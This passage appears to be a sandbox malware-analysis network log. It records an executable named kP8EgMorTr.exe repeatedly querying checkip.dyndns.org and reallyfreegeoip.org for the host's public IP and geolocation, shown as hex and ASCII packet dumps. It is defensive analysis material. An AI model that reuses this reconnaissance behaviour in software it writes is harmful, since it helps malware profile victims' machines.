                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          5192.168.2.749753132.226.8.169807432C:\Users\user\Desktop\kP8EgMorTr.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 6, 2025 07:41:21.523199081 CET127OUTGET / HTTP/1.1
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                          Host: checkip.dyndns.org
                                                                                          Jan 6, 2025 07:41:22.372560024 CET273INHTTP/1.1 200 OK
                                                                                          Date: Mon, 06 Jan 2025 06:41:22 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 104
                                                                                          Connection: keep-alive
                                                                                          Cache-Control: no-cache
                                                                                          Pragma: no-cache
                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          6192.168.2.749766132.226.8.169807432C:\Users\user\Desktop\kP8EgMorTr.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 6, 2025 07:41:23.008546114 CET151OUTGET / HTTP/1.1
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                          Host: checkip.dyndns.org
                                                                                          Connection: Keep-Alive
                                                                                          Jan 6, 2025 07:41:23.799911976 CET273INHTTP/1.1 200 OK
                                                                                          Date: Mon, 06 Jan 2025 06:41:23 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 104
                                                                                          Connection: keep-alive
                                                                                          Cache-Control: no-cache
                                                                                          Pragma: no-cache
                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          7192.168.2.749778132.226.8.169807432C:\Users\user\Desktop\kP8EgMorTr.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 6, 2025 07:41:24.441690922 CET151OUTGET / HTTP/1.1
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                          Host: checkip.dyndns.org
                                                                                          Connection: Keep-Alive
                                                                                          Jan 6, 2025 07:41:25.205018044 CET273INHTTP/1.1 200 OK
                                                                                          Date: Mon, 06 Jan 2025 06:41:25 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 104
                                                                                          Connection: keep-alive
                                                                                          Cache-Control: no-cache
                                                                                          Pragma: no-cache
                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                          HTTPS Proxied Packets

                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          0192.168.2.749703188.114.97.34437432C:\Users\user\Desktop\kP8EgMorTr.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-06 06:41:08 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                          Host: reallyfreegeoip.org
                                                                                          Connection: Keep-Alive
                                                                                          2025-01-06 06:41:08 UTC857INHTTP/1.1 200 OK
                                                                                          Date: Mon, 06 Jan 2025 06:41:08 GMT
                                                                                          Content-Type: text/xml
                                                                                          Content-Length: 362
                                                                                          Connection: close
                                                                                          Age: 1460457
                                                                                          Cache-Control: max-age=31536000
                                                                                          cf-cache-status: HIT
                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xVaotzT3ecLl63OAcd7BI91ehzAI85QtV0e486PZctFaSw2HKj3Swef2O9v6kM6YGMSdG2Gmh09aX%2F8IrGXqRVEw4mQgpAWjEJDP56tDl9rG1KSp%2BnZeZzX1Uv%2Fq%2FvpHsG6ASS0K"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fd9b87b9d2042fd-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1598&min_rtt=1597&rtt_var=601&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1817050&cwnd=248&unsent_bytes=0&cid=4dc63db8c35b5887&ts=243&x=0"
                                                                                          2025-01-06 06:41:08 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          1192.168.2.749706188.114.97.34437432C:\Users\user\Desktop\kP8EgMorTr.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-06 06:41:11 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                          Host: reallyfreegeoip.org
                                                                                          2025-01-06 06:41:11 UTC854INHTTP/1.1 200 OK
                                                                                          Date: Mon, 06 Jan 2025 06:41:11 GMT
                                                                                          Content-Type: text/xml
                                                                                          Content-Length: 362
                                                                                          Connection: close
                                                                                          Age: 1460460
                                                                                          Cache-Control: max-age=31536000
                                                                                          cf-cache-status: HIT
                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RmkKcjyvHtn33kKWhdvwJuFKw6ykcpR1HcFweyi8wdJ2dz7IzVyj92cI8%2BEBJxf%2BvblbkyfF1dRgty0M8RYG0dkkelw9wu8kZbFKPNvG94nZcQZPjUNgOZbwXvBt1gzXZzwHfpJu"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fd9b88dbaec43f1-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4172&min_rtt=1602&rtt_var=2290&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1822721&cwnd=218&unsent_bytes=0&cid=00b6a7e2fcaea1ae&ts=151&x=0"
                                                                                          2025-01-06 06:41:11 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          2192.168.2.749708188.114.97.34437432C:\Users\user\Desktop\kP8EgMorTr.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-06 06:41:14 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                          Host: reallyfreegeoip.org
                                                                                          Connection: Keep-Alive
                                                                                          2025-01-06 06:41:14 UTC859INHTTP/1.1 200 OK
                                                                                          Date: Mon, 06 Jan 2025 06:41:14 GMT
                                                                                          Content-Type: text/xml
                                                                                          Content-Length: 362
                                                                                          Connection: close
                                                                                          Age: 1460463
                                                                                          Cache-Control: max-age=31536000
                                                                                          cf-cache-status: HIT
                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7pPw44ElCQbWCXghbvQ%2B9MPeaStnG7fDbuIFLZbfaYEIMHK9frQRkvMuVfVUEBAzg35mtbWrnLslttKKxMOq1%2F0OSFUZmD%2FnAsMZle07RvS46jl%2Fm8hyNk1AUelW%2F3V8LvGJnyKJ"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fd9b8a2ffe34237-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1721&min_rtt=1709&rtt_var=665&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1615938&cwnd=194&unsent_bytes=0&cid=d2e8156bc8779445&ts=138&x=0"
                                                                                          2025-01-06 06:41:14 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          3192.168.2.749711188.114.97.34437432C:\Users\user\Desktop\kP8EgMorTr.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-06 06:41:16 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                          Host: reallyfreegeoip.org
                                                                                          Connection: Keep-Alive
                                                                                          2025-01-06 06:41:16 UTC853INHTTP/1.1 200 OK
                                                                                          Date: Mon, 06 Jan 2025 06:41:16 GMT
                                                                                          Content-Type: text/xml
                                                                                          Content-Length: 362
                                                                                          Connection: close
                                                                                          Age: 1460465
                                                                                          Cache-Control: max-age=31536000
                                                                                          cf-cache-status: HIT
                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZAjoMAPdQZkyueQvhDD38ASnxX9EUZOF3IvTmupSZUek7RfHvPkpNlz6%2BosJOmYMUPCEzYYUkJRNUB3Pia8P2fmgiknFuLJXSk4rmayIj7uqvHndN4nlxBa3eqPMQ4HBJA%2FJlLRz"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fd9b8ababe57290-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1958&min_rtt=1954&rtt_var=740&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1470292&cwnd=249&unsent_bytes=0&cid=497d8d80d5b3627d&ts=140&x=0"
                                                                                          2025-01-06 06:41:16 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          4192.168.2.749750188.114.97.34437432C:\Users\user\Desktop\kP8EgMorTr.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-06 06:41:21 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                          Host: reallyfreegeoip.org
                                                                                          Connection: Keep-Alive
                                                                                          2025-01-06 06:41:21 UTC855INHTTP/1.1 200 OK
                                                                                          Date: Mon, 06 Jan 2025 06:41:21 GMT
                                                                                          Content-Type: text/xml
                                                                                          Content-Length: 362
                                                                                          Connection: close
                                                                                          Age: 1460470
                                                                                          Cache-Control: max-age=31536000
                                                                                          cf-cache-status: HIT
                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LAbhHh9QOAl1M7lJa76P8aYEGML1Q1pa6vh8tfrOI4KuID25NJw4QyekHcT7Nlzf4OWgAPfJofGauOmwQaTpQMknLy4YwezPnna7k%2BSM3%2FuWWlVIUpcDzmJYgRvsJK6%2B0b0aOMS4"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fd9b8cd1e947c93-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1823&min_rtt=1816&rtt_var=695&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1558164&cwnd=210&unsent_bytes=0&cid=28c2e7e1814e0bfd&ts=140&x=0"
                                                                                          2025-01-06 06:41:21 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          5192.168.2.749761188.114.97.34437432C:\Users\user\Desktop\kP8EgMorTr.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-06 06:41:22 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                          Host: reallyfreegeoip.org
                                                                                          Connection: Keep-Alive
                                                                                          2025-01-06 06:41:22 UTC855INHTTP/1.1 200 OK
                                                                                          Date: Mon, 06 Jan 2025 06:41:22 GMT
                                                                                          Content-Type: text/xml
                                                                                          Content-Length: 362
                                                                                          Connection: close
                                                                                          Age: 1460472
                                                                                          Cache-Control: max-age=31536000
                                                                                          cf-cache-status: HIT
                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NBPbxESmJvuAlw0yhIzHPX%2B7XQwVWbdson6a0EjrjWAV8YaAdIep4wOp7mZrh%2BcVknBy%2BtpzqOVLbNyTnKZBmTf3eXYWOIFieV4NRY1z6f0Q0u1Ca36CuvJURz5tJs9xxA46VTWm"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fd9b8d6581242f2-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1724&min_rtt=1722&rtt_var=651&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1675272&cwnd=222&unsent_bytes=0&cid=0ad38f9d44efe2ed&ts=159&x=0"
                                                                                          2025-01-06 06:41:22 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          6192.168.2.749772188.114.97.34437432C:\Users\user\Desktop\kP8EgMorTr.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-06 06:41:24 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                          Host: reallyfreegeoip.org
                                                                                          Connection: Keep-Alive
                                                                                          2025-01-06 06:41:24 UTC855INHTTP/1.1 200 OK
                                                                                          Date: Mon, 06 Jan 2025 06:41:24 GMT
                                                                                          Content-Type: text/xml
                                                                                          Content-Length: 362
                                                                                          Connection: close
                                                                                          Age: 1460473
                                                                                          Cache-Control: max-age=31536000
                                                                                          cf-cache-status: HIT
                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FmcRFT1EreoCyY9LGAvGv9wkb4n%2F8j2Z83D01m5YWqNapMT16PqZROLCpf%2BVo5YikphnkZa19pJN01dxymbV8ZJzjWVPS1U6zE63n3zdLKPF0xmEmJnr0zJypvcbVgNd9ltl%2FRgb"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fd9b8df5eb6438b-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1555&min_rtt=1549&rtt_var=594&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1821584&cwnd=169&unsent_bytes=0&cid=e52786e830295ead&ts=158&x=0"
                                                                                          2025-01-06 06:41:24 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          7192.168.2.749784188.114.97.34437432C:\Users\user\Desktop\kP8EgMorTr.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-06 06:41:25 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                          Host: reallyfreegeoip.org
                                                                                          2025-01-06 06:41:25 UTC851INHTTP/1.1 200 OK
                                                                                          Date: Mon, 06 Jan 2025 06:41:25 GMT
                                                                                          Content-Type: text/xml
                                                                                          Content-Length: 362
                                                                                          Connection: close
                                                                                          Age: 1460474
                                                                                          Cache-Control: max-age=31536000
                                                                                          cf-cache-status: HIT
                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SkZaY5fe1nnAq3uwrSSmsuBijRBwBJE5virQps18fppC39v9nDd4AfU5DrD0cAQMeXbxZCiIRYGI1Cq%2FAvUoDVSv8o3TR7qCJ85SRI0PdG6DDAfLnjCya6j5blaghALJ2NC5CgkV"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fd9b8e809c4421d-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1906&min_rtt=1906&rtt_var=715&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1531200&cwnd=177&unsent_bytes=0&cid=12162f04d6edbbc5&ts=156&x=0"
